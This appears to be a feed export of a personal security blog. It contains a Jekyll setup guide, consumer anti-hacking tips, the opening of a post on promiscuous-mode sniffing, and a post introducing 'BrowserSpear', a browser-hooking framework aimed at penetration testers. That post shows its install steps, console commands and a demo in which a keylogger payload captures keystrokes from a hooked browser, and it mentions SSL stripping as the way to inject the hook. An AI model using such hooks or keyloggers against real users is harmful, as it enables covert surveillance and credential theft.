Jekyll2021-09-07T10:19:46+00:00https://lvlrt.github.io//lvlrtPersonal site of Lars VeelaertLars VeelaertHow to build a site with Jekyll and Github Pages2018-01-08T00:00:00+00:002018-01-08T00:00:00+00:00https://lvlrt.github.io/2018/01/08/how-to-build-a-site-with-jekyll-and-github-pages<p><img src="/assets/jekyll_pages.jpg" alt="Jekyll and Pages Logo" /></p>
<p><em>As a terminal-guy, I never really like the way Content Management Systems for websites work. Sure, they provide great UX (mostly) for the average user. But what if I want to skip all that and just make a barebones site that is easily manageable with the applications I already have on my system now?</em></p>
<p>Welcome in the realm of static site generators. <em>Awesome… So if I want to change something I have to write HTML and CSS myself?</em> No… That is a possibility, if you want a static page for your company or just a landing page but I wanted a blog so using something like <a href="https://jekyllrb.com/">Jekyll</a> in combination with <a href="https://pages.github.com/">Github Pages</a> is more logical. Let’s walk through how to set it up.</p>
<h2>How it works</h2>
<p><a href="https://pages.github.com/">Github Pages</a> supports <a href="https://jekyllrb.com/">Jekyll</a>, a static site generator. Which means, that there is no backend, database or hosting to configure. To add content to the site, you can use a markdown language, which makes it easy to write beautiful articles without messing with HTML and CSS.</p>
<p>You can have a <a href="https://pages.github.com/">Github Pages</a> site for every repo (Private or Public) and also one extra per user. Without adding your own custom domain, your website URL will be:<code class="language-plaintext highlighter-rouge">https://<user>.github.io/<repo></code>. You do have to enable this feature on the Github-platform itself before they get hosted.</p>
<h2>Creating the repo</h2>
<p>To define the contents of your personal page, you have to make a repo with a name that exactly matches the following format:<code class="language-plaintext highlighter-rouge"><user>.github.io</code>. So in my case this is: <code class="language-plaintext highlighter-rouge">larsveelaert.github.io</code>. Normal project pages can have any name.</p>
<p>Now when you go to your new or existing repo and hit <em>Settings</em>, scroll down and you will find the Github Pages-section. Under <em>Source</em>, Choose your branch to host your files and that is all you will have to do for the hosting of your site. Easy right?</p>
<h2>Search a theme</h2>
<p>Now get your Google-skills on and search for “<em>Jekyll themes</em>”. Often you will find Github-repo’s with a demo link. If you like one, continue…</p>
<p>The easiest way to copy that theme is to clone the repo of that theme, and copy all its contents to your own repo. For example with the <em><a href="https://github.com/yous/whiteglass">Whiteglass</a></em>-theme do:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/yous/whiteglass.git
cp -R whiteglass/* larsveelaert.github.io/
</code></pre></div></div>
<p>You will have to set 2 settings to the right value before the site will work, namely <em>baseurl</em> and <em>url</em>. Your settings can be found in `_config.yml’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>baseurl: "" # the subpath of your site, e.g. /blog
url: "https://larsveelaert.github.io" # the base hostname & protocol for your site, e.g. http://example.com
</code></pre></div></div>
<p>Now push your changes to your site’s repo and you have succesfully copied the theme:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git add -all
git commit -a -m 'theme setup'
git push
</code></pre></div></div>
<p>After a brief waiting period, browse to your website and you should see your chosen theme presented.</p>
<h2>Making changes and adding content</h2>
<p>The great thing about this approach is that we can run <a href="https://jekyllrb.com/">Jekyll</a> ourselves locally, so that we do not have to rely on one centralized way of changing content.
Make sure <em><a href="https://www.ruby-lang.org/en/">Ruby</a></em> is installed and run the following commands in your repo:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gem install jekyll bundler
bundle exec jekyll serve
</code></pre></div></div>
<p>Now your site will be served on <code class="language-plaintext highlighter-rouge">localhost:4000</code>. If your want the make it rebuild the site if any of the files change, add the following option <code class="language-plaintext highlighter-rouge">--watch</code>. This is a great option to use when writing and previewing an article.</p>
<p>The main settings like page-title and social links will be set in the <code class="language-plaintext highlighter-rouge">_config.yml</code> file of your repo. Every theme is a bit different. But go through the docs of your specific theme and you will find lean ways how to change the navigation or how to add extra pages.</p>
<p>You can find your posts in the <code class="language-plaintext highlighter-rouge">_posts</code>-folder and it is there that you can just create a new file and write your articles in <a href="https://nl.wikipedia.org/wiki/Markdown">Markdown</a>. A great resource to learn the basics of Markdown is <a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">this Github-page</a></p>
<h2>TIP: –drafts</h2>
<p>Something that is really usefull is making a <code class="language-plaintext highlighter-rouge">_drafts</code> folder. Here you can add posts that will not be added to your regular feed. To process them and preview the result you can add the <code class="language-plaintext highlighter-rouge">--drafts</code> switch to your local <code class="language-plaintext highlighter-rouge">jekyll</code>-command and they will appear as most recent blog-posts.</p>
<h2>TIP: –incremental</h2>
<p>When the –watch parameter is active, the site will be rebuilt whenever a file changes. If you only want to built the files that changed, use <code class="language-plaintext highlighter-rouge">--incremental</code>.</p>
<h2>Conclusion</h2>
<p>Using just a text-editor and the great infrastructure of Github Pages, makes it really easy to push changes with all the advantages we know from <em><a href="https://git-scm.com/">Git</a></em>.
The option to edit offline, have offline-backups of the complete source and really manage the changes is a great option. Not having a backend to maintain is also a great win for security.</p>
<p>Have fun!</p>Lars VeelaertAs a terminal-guy, I never really like the way Content Management Systems for websites work. Sure, they provide great UX (mostly) for the average user. But what if I want to skip all that and just make a barebones site that is easily manageable with the applications I already have on my system now? Welcome in the realm of static site generators. Awesome… So if I want to change something I have to write HTML and CSS myself? No… That is a possibility, if you want a static page for your company or just a landing page but I wanted a blog so using something like Jekyll in combination with Github Pages is more logical. Let’s walk through how to set it up. How it works Github Pages supports Jekyll, a static site generator. Which means, that there is no backend, database or hosting to configure. To add content to the site, you can use a markdown language, which makes it easy to write beautiful articles without messing with HTML and CSS. You can have a Github Pages site for every repo (Private or Public) and also one extra per user. Without adding your own custom domain, your website URL will be:https://<user>.github.io/<repo>. You do have to enable this feature on the Github-platform itself before they get hosted. Creating the repo To define the contents of your personal page, you have to make a repo with a name that exactly matches the following format:<user>.github.io. So in my case this is: larsveelaert.github.io. Normal project pages can have any name. Now when you go to your new or existing repo and hit Settings, scroll down and you will find the Github Pages-section. Under Source, Choose your branch to host your files and that is all you will have to do for the hosting of your site. Easy right? Search a theme Now get your Google-skills on and search for “Jekyll themes”. Often you will find Github-repo’s with a demo link. If you like one, continue… The easiest way to copy that theme is to clone the repo of that theme, and copy all its contents to your own repo. For example with the Whiteglass-theme do: git clone https://github.com/yous/whiteglass.git cp -R whiteglass/* larsveelaert.github.io/ You will have to set 2 settings to the right value before the site will work, namely baseurl and url. Your settings can be found in `_config.yml’: baseurl: "" # the subpath of your site, e.g. /blog url: "https://larsveelaert.github.io" # the base hostname & protocol for your site, e.g. http://example.com Now push your changes to your site’s repo and you have succesfully copied the theme: git add -all git commit -a -m 'theme setup' git push After a brief waiting period, browse to your website and you should see your chosen theme presented. Making changes and adding content The great thing about this approach is that we can run Jekyll ourselves locally, so that we do not have to rely on one centralized way of changing content. Make sure Ruby is installed and run the following commands in your repo: gem install jekyll bundler bundle exec jekyll serve Now your site will be served on localhost:4000. If your want the make it rebuild the site if any of the files change, add the following option --watch. This is a great option to use when writing and previewing an article. The main settings like page-title and social links will be set in the _config.yml file of your repo. Every theme is a bit different. But go through the docs of your specific theme and you will find lean ways how to change the navigation or how to add extra pages. You can find your posts in the _posts-folder and it is there that you can just create a new file and write your articles in Markdown. A great resource to learn the basics of Markdown is this Github-page TIP: –drafts Something that is really usefull is making a _drafts folder. Here you can add posts that will not be added to your regular feed. To process them and preview the result you can add the --drafts switch to your local jekyll-command and they will appear as most recent blog-posts. TIP: –incremental When the –watch parameter is active, the site will be rebuilt whenever a file changes. If you only want to built the files that changed, use --incremental. Conclusion Using just a text-editor and the great infrastructure of Github Pages, makes it really easy to push changes with all the advantages we know from Git. The option to edit offline, have offline-backups of the complete source and really manage the changes is a great option. Not having a backend to maintain is also a great win for security. Have fun!Introducing BrowserSpear, a Lightweight Browser Exploitation Framework for Embedded Devices2018-01-02T00:00:00+00:002018-01-02T00:00:00+00:00https://lvlrt.github.io/2018/01/02/Introducing-BrowserSpear,-A-Lightweight-Browser-Exploitation-Framework-For-Embedded-Devices<p><img src="/assets/intro_browserspear.jpg" alt="Intro Browserspear" /></p>
<p><em>With the rise of more IoT devices and other cheap off-the-shelf development platforms there is an opportunity to optimize the toolsets of Red-teamers, Penetration Testers and Ethical Hackers. To take full advantage of these devices we need our frameworks to be light and flexible. In this article, I want to present a tool that I built called ‘BrowserSpear’. It consist of a basic framework to exploit browsers and is capable of working on all architectures with basic server capacity. Feedback is always welcome.</em></p>
<p>When demonstrating the need for network security, there are few tools that can really get the appropriate reaction and are easy enough to demo to a crowd of people without actually sending malicious code or using an exploit which might crash the device.</p>
<p>A great demo is to try to downgrade the security of traffic on a network from SSL to unencrypted HTTP. <a href="https://demgeeks.com/hackotg-v1-4-see-all-traffic-on-a-network">We can do this</a> with tools such as <a href="https://www.bettercap.org">Bettercap</a>, <a href="https://moxie.org/software/sslstrip/">SSLstrip</a> or another variant. After this security downgrade, it is possible to inject extra code into HTTP connections to make the website’s background pink or give an alert. Just something that is very noticable to a user and that will get a reaction.</p>
<p>What takes this to the next level is Browser Exploitation. The very famous tool <a href="https://beefproject.com/">BeEF</a> (Browser Exploitation Framework Project) can control the complete website a target loaded over an unsecure connection after an extra script is injected into it which ‘hooks’ the client and makes it receive commands from <a href="https://beefproject.com/">BeEF</a>.</p>
<h2>The issue</h2>
<p>Browser Exploitation is nothing new and BeEF is a well-known tool, but it is a bit older, and needs a lot of extra dependencies. Here is were the usage of old libraries like libv8 and specific Ruby gems start to become an issue. Which makes it almost impossible to install on the newer architectures like ARM.</p>
<p>We see many auditing devices built on a mobile architecture such as ARM surface such as the <a href="https://www.wifipineapple.com/">WiFi Pineapple</a>, <a href="https://www.hak5.org/gear/packet-squirrel">Packet Squirrel</a> and even <a href="https://null-byte.wonderhowto.com/how-to/rooted-android-your-new-pentesting-tool-0159093">your own rooted Android smartphone</a>. Which are compact tools that make a great portable and reliable platform. Using these devices on-the-go or for example a Raspberry Pi as a low-powered server in the cloud is an excellent use of these new and cheaper devices to audit networks and demonstrate attack vectors.</p>
<h2>So what is BrowserSpear?</h2>
<blockquote>
<p>Browserspear is a lightweight framework built on the <a href="https://nodejs.org/en/">NodeJS</a> engine. The complete core and modules are written in Javascript and adding payloads is as simple as writing an extra function and saving it in the ‘modules’ folder.</p>
</blockquote>
<p>A device that has the server capacity to run NodeJS will be able to act as a server to ‘spear’ browsers and the complete behavior of the server can be controlled from a shell prompt or scripted beforehand.</p>
<p>BrowserSpear is still under development, but can be found in <a href="https://github.com/larsveelaert/browserspear">this Github repo</a>. The core functionalities like code delivery and hooking or ‘spearing’ targets are fully working.</p>
<h2>How to get started</h2>
<p>With NodeJS and NPM installed (through your favourite package manager). Clone the Github-repo and install the following packages:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/larsveelaert/browserspear.git
npm install websockets prompt uglify-js commander
</code></pre></div></div>
<p>Starting a console session is as simple as running the script. –help will give you all the extra info you need for advanced configuration.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ node browserspear.js --help
Usage: browserspear [options]
Options:
-V, --version output the version number
-c, --commandfile <file> file with commands to run in the console
-p, --port <port> Port to listen on
-i, --ip <ip> The ip address to use in the reverse connection
-s, --start Start a listener immediatly
-h, --help output usage informatio
</code></pre></div></div>
<p>In the BrowserSpear console. You can get a list of available commands by typing ‘help’. Here is an extract:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>>> help
Available commands:
- start | restart
Restarts the server that serves the spear and provides the socket to connect to
- set <property> <value>
Sets a value used by the server or module. ex. 'set LHOST: mydomain.org'
- options
List all the values of the options.
- load <module>
Loads the functions inside that module. Only one module can be selected at once. ex. 'load keylogger'
- modules <search>
Gives a list of all available modules, with an optional searchterm.
- exec
Executes the 'exec' function of the current selected module. Ex. send a payload
- conns
List all connections to the server
- help
Print this help.
</code></pre></div></div>
<p>The default address of the spear is localhost:1337. So navigating to this address on you local device running the server (started with start). Would give you the following output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>>> start
>>> Tue Jan 02 2018 14:11:14 GMT+0000 (UTC) Server is listening on port 1337
New connection to client at ::1
>>> conns
List of connections:
[0] ::1
</code></pre></div></div>
<p>Now we can load a module, for example an attack that logs all keystrokes in that browser called a keylogger. By default, the attack is sent to all the clients connected. The client will then record the keystrokes and send them to the server. The attack will stay active, even if the server is restarted or the module is unloaded.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>>> load keylogger
>>> keylogger: exec
Payload sent
>>> keylogger:
https://www.linkedin.com/redir/invalid-link-page?url=%5B%3A%3A1%5D KEYLOGGER:I will now tell you all my secrets
</code></pre></div></div>
<p>Thats it for the basic usage. As you have control over the full webpage. There is no limit on what you can do within the constraints of Javascript. There are already known attacks to get persistance on the full-domain, cross-domain and even cross-browser.</p>
<p>Looking forward to the <a href="https://developers.google.com/web/progressive-web-apps/">Progressive Web Applications</a>. There is a need to correctly mitigate against this attack vector because the native API’s already available in the browser are quite powerful and can be easily used against the user (ex. HTML5 webcam, Mic, GPS, Contacts, File access, …). The ever smaller gap between online and offline will create a need for strong security analysis so system access can be strictly controlled.</p>
<h2>Goals and Roadmap</h2>
<p>BrowserSpear will keep expanding it’s capabilities aiming towards connection types (including obfiscation/evasion) and pre-configured payloads to make the complete framework very easy to use and very ‘hackable’.</p>
<p>As it is an open-source project, development will happen through <a href="https://github.com/larsveelaert/browserspear">its Github page</a>. Please feel free to contact me for more info, give feedback or even help to develop the project to its full potential.</p>
<p>Happy spearing!</p>Lars VeelaertWith the rise of more IoT devices and other cheap off-the-shelf development platforms there is an opportunity to optimize the toolsets of Red-teamers, Penetration Testers and Ethical Hackers. To take full advantage of these devices we need our frameworks to be light and flexible. In this article, I want to present a tool that I built called ‘BrowserSpear’. It consist of a basic framework to exploit browsers and is capable of working on all architectures with basic server capacity. Feedback is always welcome. When demonstrating the need for network security, there are few tools that can really get the appropriate reaction and are easy enough to demo to a crowd of people without actually sending malicious code or using an exploit which might crash the device. A great demo is to try to downgrade the security of traffic on a network from SSL to unencrypted HTTP. We can do this with tools such as Bettercap, SSLstrip or another variant. After this security downgrade, it is possible to inject extra code into HTTP connections to make the website’s background pink or give an alert. Just something that is very noticable to a user and that will get a reaction. What takes this to the next level is Browser Exploitation. The very famous tool BeEF (Browser Exploitation Framework Project) can control the complete website a target loaded over an unsecure connection after an extra script is injected into it which ‘hooks’ the client and makes it receive commands from BeEF. The issue Browser Exploitation is nothing new and BeEF is a well-known tool, but it is a bit older, and needs a lot of extra dependencies. Here is were the usage of old libraries like libv8 and specific Ruby gems start to become an issue. Which makes it almost impossible to install on the newer architectures like ARM. We see many auditing devices built on a mobile architecture such as ARM surface such as the WiFi Pineapple, Packet Squirrel and even your own rooted Android smartphone. Which are compact tools that make a great portable and reliable platform. Using these devices on-the-go or for example a Raspberry Pi as a low-powered server in the cloud is an excellent use of these new and cheaper devices to audit networks and demonstrate attack vectors. So what is BrowserSpear? Browserspear is a lightweight framework built on the NodeJS engine. The complete core and modules are written in Javascript and adding payloads is as simple as writing an extra function and saving it in the ‘modules’ folder. A device that has the server capacity to run NodeJS will be able to act as a server to ‘spear’ browsers and the complete behavior of the server can be controlled from a shell prompt or scripted beforehand. BrowserSpear is still under development, but can be found in this Github repo. The core functionalities like code delivery and hooking or ‘spearing’ targets are fully working. How to get started With NodeJS and NPM installed (through your favourite package manager). Clone the Github-repo and install the following packages: git clone https://github.com/larsveelaert/browserspear.git npm install websockets prompt uglify-js commander Starting a console session is as simple as running the script. –help will give you all the extra info you need for advanced configuration. $ node browserspear.js --help Usage: browserspear [options] Options: -V, --version output the version number -c, --commandfile <file> file with commands to run in the console -p, --port <port> Port to listen on -i, --ip <ip> The ip address to use in the reverse connection -s, --start Start a listener immediatly -h, --help output usage informatio In the BrowserSpear console. You can get a list of available commands by typing ‘help’. Here is an extract: >>> help Available commands: - start | restart Restarts the server that serves the spear and provides the socket to connect to - set <property> <value> Sets a value used by the server or module. ex. 'set LHOST: mydomain.org' - options List all the values of the options. - load <module> Loads the functions inside that module. Only one module can be selected at once. ex. 'load keylogger' - modules <search> Gives a list of all available modules, with an optional searchterm. - exec Executes the 'exec' function of the current selected module. Ex. send a payload - conns List all connections to the server - help Print this help. The default address of the spear is localhost:1337. So navigating to this address on you local device running the server (started with start). Would give you the following output: >>> start >>> Tue Jan 02 2018 14:11:14 GMT+0000 (UTC) Server is listening on port 1337 New connection to client at ::1 >>> conns List of connections: [0] ::1 Now we can load a module, for example an attack that logs all keystrokes in that browser called a keylogger. By default, the attack is sent to all the clients connected. The client will then record the keystrokes and send them to the server. The attack will stay active, even if the server is restarted or the module is unloaded. >>> load keylogger >>> keylogger: exec Payload sent >>> keylogger: https://www.linkedin.com/redir/invalid-link-page?url=%5B%3A%3A1%5D KEYLOGGER:I will now tell you all my secrets Thats it for the basic usage. As you have control over the full webpage. There is no limit on what you can do within the constraints of Javascript. There are already known attacks to get persistance on the full-domain, cross-domain and even cross-browser. Looking forward to the Progressive Web Applications. There is a need to correctly mitigate against this attack vector because the native API’s already available in the browser are quite powerful and can be easily used against the user (ex. HTML5 webcam, Mic, GPS, Contacts, File access, …). The ever smaller gap between online and offline will create a need for strong security analysis so system access can be strictly controlled. Goals and Roadmap BrowserSpear will keep expanding it’s capabilities aiming towards connection types (including obfiscation/evasion) and pre-configured payloads to make the complete framework very easy to use and very ‘hackable’. As it is an open-source project, development will happen through its Github page. Please feel free to contact me for more info, give feedback or even help to develop the project to its full potential. Happy spearing!11 Tips to protect yourself from being hacked2017-12-13T00:00:00+00:002017-12-13T00:00:00+00:00https://lvlrt.github.io/2017/12/13/11-Tips-To-Protect-Yourself-From-Being-Hacked<p><img src="/assets/11_tips_hacked.jpg" alt="Intro 11 tips hacked" /></p>
<p><em>We all live online and have complete digital lives. To chat, work, live and buy online means that we need to get the right data to the right person. First let’s start with which data is so important to us and so desired by nefarious actors in the digital world.</em></p>
<p>If you say ‘I have nothing to hide’, you’re very much mistaken. We all regularly use our payment-info online, and if somebody could file your taxes instead of you by stealing your identity, that could be a problem. We all want to keep our privacy, but if the devices we use can be turned into tools to spy on us, that could be a problem…</p>
<blockquote>
<p>If you say ‘I have nothing to hide’, you’re very much mistaken.</p>
</blockquote>
<p>But how can you protect yourself against possible attacks to gather your data or the invade your privacy? A lot of data is stored with the companies we entrust our data to. If data gets leaked from their servers, there is nothing we can do. But a lot of times we are the weakest link ourselves. These 11 tips will give you a list of things you can do to raise your personal protection level.</p>
<p>Definitions of some terms used in the article;</p>
<ul>
<li><a href="https://en.wikipedia.org/wiki/Malware">Malware</a>: <em>is the software that an attacker want to get on your system to control or monitor it.</em></li>
<li><a href="https://en.wikipedia.org/wiki/Exploit_(computer_security)">Exploit</a>: <em>is the attack that is developed to use a weakness for getting access or doing unintended things.</em></li>
</ul>
<h2>1. Reboot your device every day</h2>
<p>Apart from being the greatest tip in IT-support history, it also has some real upsides from a security standpoint. Your updated software will be restarted and your temporary memory will be emptied.</p>
<p>This last one is an interesting one. If you trigger malware on your system (open a nefarious file, click a wrong URL), it will start its live in temporary memory. In many cases it takes another vulnerability to make the ‘hack’ persistent across reboots.</p>
<p>So a good habit would be to reboot your laptop, smartphone, tablet, … once a day. It’s great for stability, performance and security.</p>
<h2>2. Disable features of your device</h2>
<p>Have you seen the post-its covering the webcam on a colleague’s laptop? This is a great tip. If somebody would get unintended access to your device’s webcam, it would still be unusable.</p>
<p>You can continue this line of thinking, and put a piece of tape over your microphone, turn off Wifi, Bluetooth and GPS when you are not using it. It’ll not only save you some battery life, but you’ll limit the vectors of attacks and data that can be used against you.</p>
<h2>3. Use a modern browser</h2>
<p>Use a modern browser like <a href="https://www.google.com/chrome/browser/desktop/index.html">Google Chrome</a> or <a href="https://www.mozilla.org/en-US/firefox/new">Firefox</a>. They update themselves and will protect you from scams and malicious content. If you work at a company and can’t install new software, ask the IT-person which browser is configured on your machine. Internet Explorer 9 is not a good answer.</p>
<h2>4. Keep all your software up-to-date</h2>
<p>This is not an unexpected one, many vulnerabilities are patched in the most recent software and most malware is older and is being reused by nefarious people.</p>
<p>Actively look for updates of your Operating system (OSX, Windows, iOS, Android, …) and for popular software such as Microsoft Office (Word, Excel, …) and your PDF-reader (ex. Acrobat Reader). The software packages mentioned above is the most widely used for injecting malware into your system. Most software auto-updates or asks permission to do so, if you are not sure, ask a tech-savvy person if it’s a good idea to click ‘Yes’.</p>
<h2>5. Install an ad blocker</h2>
<p>A great way to get less annoying screens that pop up, trying to sell you something or tell you you have won something, is to install an extension for your browser called an ‘ad blocker’.</p>
<p>This is specific to which browser you use (mentioned before), so a quick Google-search with the name of your browser and ‘ad blocker’ will get you in the right direction.</p>
<p>Harass your local IT-guru if you need help or are in doubt of installing the right program.</p>
<h2>6. Use the incognito mode of your browser</h2>
<p>If you don’t want the site that you are visiting to track you or just don’t want these sites to show up in your history, use a special feature built into most modern browsers called ‘Private’ or ‘Incognito’-mode. In this mode your browser will not store any info (cache or history), leak any info about the location of the device, etc .. and disable all the plugins installed.</p>
<p>It will not make your device more secure but it will keep your data and habits more private and will keep your searches from being completed to something you don’t want to show up when you are at the office.</p>
<h2>7. Have a basic but good Antivirus</h2>
<p>This is a topic of a lot of discussion because antivirus is not a remedy for all problems. Antivirus will (among other things) check new files coming onto your system and search for malicious content.</p>
<p>There are apps for your mobile devices who claim to do the same, but often don’t. They can not check incoming files that are opened by other apps. These apps often give tips and assistance when browsing the web. No actual protection.</p>
<p>Other operating systems like Windows 10, has a antivirus built-in. But it’s a good idea to complement it with another free option. And yes, against popular belief, your Mac can be hacked.</p>
<h2>8. Diversify and protect your passwords</h2>
<p>This one is almost beaten to death but it’s one of the most important ones.</p>
<p>Yes, having one very strong password will be hard to crack. But if it is leaked by a data leak, all your services will be exposed because you used the same password.</p>
<p>Having easier passwords that you can remember, but changing them up between services will make it easier for a password to be cracked but at least it will be contained.</p>
<p>The best approach is to combine the best of both and use a password manager to help you remember the different passwords. A good password manager encrypts your passwords with one strong password, and that is the only one you will have to remember.</p>
<h2>9. Don’t open attachments from email addresses you don’t know</h2>
<p>A very common attack-vector for many hackers is sending an email with a malicious file attached. If you would open this file, the file will try to exploit outdated software on your system. This is not something that you will notice, the file can be empty or even a legit document.</p>
<p>So If you get such a suspicious email, just delete it or report it to the IT-staff of your company.</p>
<h2>10. Don’t connect to open (unsecured) Wifi</h2>
<p>We all are desperate to search for free Wifi when we sit down at a local Coffee-shop or are staying at an hotel. Many places will have a sign with the password, or the Wifi will just be openly accessible.</p>
<p>There are 2 problems with this. The first is when you are connected. You have no protection from a router or firewall. If your traffic is not secured with an extra layer (VPN, encryption), your traffic will be visible to all the others who can get access to that network and sometimes it is even possible to intercept and change some data.</p>
<p>Secondly, your device will search for the name of that Wifi-hotspot everywhere it goes. If a nefarious person would make a Wifi-hotspot with the same name, your device would connect without you knowing and re-exposing you to the danger mentioned above.</p>
<p>You can check your wireless settings if you have such networks saved to auto-reconnect and if you do, make your device forget them.</p>
<h2>11. Scan your pc regularly with an anti-malware scanner</h2>
<p>You often can’t prevent every piece of malware from getting onto your system. And if you did something in a rush and made a mistake you should be able to clean your system.</p>
<p>A great option is an anti-malware scanner, again a Google-search will give you a good option for your specific operating system. If you do this once a month and every time you think you’ve been exposed to malware you will have a very well maintained machine.</p>Lars VeelaertWe all live online and have complete digital lives. To chat, work, live and buy online means that we need to get the right data to the right person. First let’s start with which data is so important to us and so desired by nefarious actors in the digital world. If you say ‘I have nothing to hide’, you’re very much mistaken. We all regularly use our payment-info online, and if somebody could file your taxes instead of you by stealing your identity, that could be a problem. We all want to keep our privacy, but if the devices we use can be turned into tools to spy on us, that could be a problem… If you say ‘I have nothing to hide’, you’re very much mistaken. But how can you protect yourself against possible attacks to gather your data or the invade your privacy? A lot of data is stored with the companies we entrust our data to. If data gets leaked from their servers, there is nothing we can do. But a lot of times we are the weakest link ourselves. These 11 tips will give you a list of things you can do to raise your personal protection level. Definitions of some terms used in the article; Malware: is the software that an attacker want to get on your system to control or monitor it. Exploit: is the attack that is developed to use a weakness for getting access or doing unintended things. 1. Reboot your device every day Apart from being the greatest tip in IT-support history, it also has some real upsides from a security standpoint. Your updated software will be restarted and your temporary memory will be emptied. This last one is an interesting one. If you trigger malware on your system (open a nefarious file, click a wrong URL), it will start its live in temporary memory. In many cases it takes another vulnerability to make the ‘hack’ persistent across reboots. So a good habit would be to reboot your laptop, smartphone, tablet, … once a day. It’s great for stability, performance and security. 2. Disable features of your device Have you seen the post-its covering the webcam on a colleague’s laptop? This is a great tip. If somebody would get unintended access to your device’s webcam, it would still be unusable. You can continue this line of thinking, and put a piece of tape over your microphone, turn off Wifi, Bluetooth and GPS when you are not using it. It’ll not only save you some battery life, but you’ll limit the vectors of attacks and data that can be used against you. 3. Use a modern browser Use a modern browser like Google Chrome or Firefox. They update themselves and will protect you from scams and malicious content. If you work at a company and can’t install new software, ask the IT-person which browser is configured on your machine. Internet Explorer 9 is not a good answer. 4. Keep all your software up-to-date This is not an unexpected one, many vulnerabilities are patched in the most recent software and most malware is older and is being reused by nefarious people. Actively look for updates of your Operating system (OSX, Windows, iOS, Android, …) and for popular software such as Microsoft Office (Word, Excel, …) and your PDF-reader (ex. Acrobat Reader). The software packages mentioned above is the most widely used for injecting malware into your system. Most software auto-updates or asks permission to do so, if you are not sure, ask a tech-savvy person if it’s a good idea to click ‘Yes’. 5. Install an ad blocker A great way to get less annoying screens that pop up, trying to sell you something or tell you you have won something, is to install an extension for your browser called an ‘ad blocker’. This is specific to which browser you use (mentioned before), so a quick Google-search with the name of your browser and ‘ad blocker’ will get you in the right direction. Harass your local IT-guru if you need help or are in doubt of installing the right program. 6. Use the incognito mode of your browser If you don’t want the site that you are visiting to track you or just don’t want these sites to show up in your history, use a special feature built into most modern browsers called ‘Private’ or ‘Incognito’-mode. In this mode your browser will not store any info (cache or history), leak any info about the location of the device, etc .. and disable all the plugins installed. It will not make your device more secure but it will keep your data and habits more private and will keep your searches from being completed to something you don’t want to show up when you are at the office. 7. Have a basic but good Antivirus This is a topic of a lot of discussion because antivirus is not a remedy for all problems. Antivirus will (among other things) check new files coming onto your system and search for malicious content. There are apps for your mobile devices who claim to do the same, but often don’t. They can not check incoming files that are opened by other apps. These apps often give tips and assistance when browsing the web. No actual protection. Other operating systems like Windows 10, has a antivirus built-in. But it’s a good idea to complement it with another free option. And yes, against popular belief, your Mac can be hacked. 8. Diversify and protect your passwords This one is almost beaten to death but it’s one of the most important ones. Yes, having one very strong password will be hard to crack. But if it is leaked by a data leak, all your services will be exposed because you used the same password. Having easier passwords that you can remember, but changing them up between services will make it easier for a password to be cracked but at least it will be contained. The best approach is to combine the best of both and use a password manager to help you remember the different passwords. A good password manager encrypts your passwords with one strong password, and that is the only one you will have to remember. 9. Don’t open attachments from email addresses you don’t know A very common attack-vector for many hackers is sending an email with a malicious file attached. If you would open this file, the file will try to exploit outdated software on your system. This is not something that you will notice, the file can be empty or even a legit document. So If you get such a suspicious email, just delete it or report it to the IT-staff of your company. 10. Don’t connect to open (unsecured) Wifi We all are desperate to search for free Wifi when we sit down at a local Coffee-shop or are staying at an hotel. Many places will have a sign with the password, or the Wifi will just be openly accessible. There are 2 problems with this. The first is when you are connected. You have no protection from a router or firewall. If your traffic is not secured with an extra layer (VPN, encryption), your traffic will be visible to all the others who can get access to that network and sometimes it is even possible to intercept and change some data. Secondly, your device will search for the name of that Wifi-hotspot everywhere it goes. If a nefarious person would make a Wifi-hotspot with the same name, your device would connect without you knowing and re-exposing you to the danger mentioned above. You can check your wireless settings if you have such networks saved to auto-reconnect and if you do, make your device forget them. 11. Scan your pc regularly with an anti-malware scanner You often can’t prevent every piece of malware from getting onto your system. And if you did something in a rush and made a mistake you should be able to clean your system. A great option is an anti-malware scanner, again a Google-search will give you a good option for your specific operating system. If you do this once a month and every time you think you’ve been exposed to malware you will have a very well maintained machine.HackOTG (v1.4): See all traffic on a network with Promiscuous mode and Bettercap2017-10-31T00:00:00+00:002017-10-31T00:00:00+00:00https://lvlrt.github.io/2017/10/31/hackotg-v1-4-see-all-traffic-on-a-network<p><img src="/assets/header_hackotgv1_4.png" alt="Header" /></p>
<p><em>This article is part of a series: <a href="/2017/10/07/hackotg-v1-0-universal-portable-security-platform/">you can find the first article here</a>.
If you missed the previous one, <a href="/2017/10/11/hackotg-v1-3-creating-our-own-hotspot-on-boot/">it is here</a>.</em></p>
<h2>First, the basics</h2>
<p>Your network card (WiFi or ethernet) is your gateway to your network and the rest of the internet. The most common way to use it is to connect to an existing network, get an IP and done! But a network card can do many other things. A good example is that WiFi cards can set up a WiFi-hotspot themselves <a href="https://www.computerworld.com/article/2499772/mobile-wireless/mobile-wireless-wi-fi-tethering-101-use-a-smartphone-as-a-mobile-hotspot.html">(mobile phone tethering)</a>. We did this to the card of our HackOTG in <a href="https://larsveelaert.github.io/2017/10/11/hackotg-v1-3-creating-our-own-hotspot-on-boot/">one of the previous articles</a>.</p>
<p>In the normal ‘client’ mode, which is just being connected to an existing network our network-card will only process packets that are directly meant for us to use or send through. We can change this behavior in 2 ways.</p>
<p>You can go into <a href="https://en.wikipedia.org/wiki/Monitor_mode">Monitor mode</a>, which means you can now see the packets in the air without connecting (associating) with any Wifi access point. Think of it like listening to people’s conversations while you walk down the street.</p>
<p>There is also <a href="https://en.wikipedia.org/wiki/Promiscuous_mode">Promiscuous</a> <a href="https://en.wikipedia.org/wiki/Promiscuous_mode">mode</a>, which is processing all packets touching the network-card. In a wireless system, you will have to be in proximity of the transmitting device, in a wired ethernet-network the packets must go through cable in which you are connected. In a normal switch setup, a packet will not be forwarded by the router, because it knows which devices are connected on which line.</p>
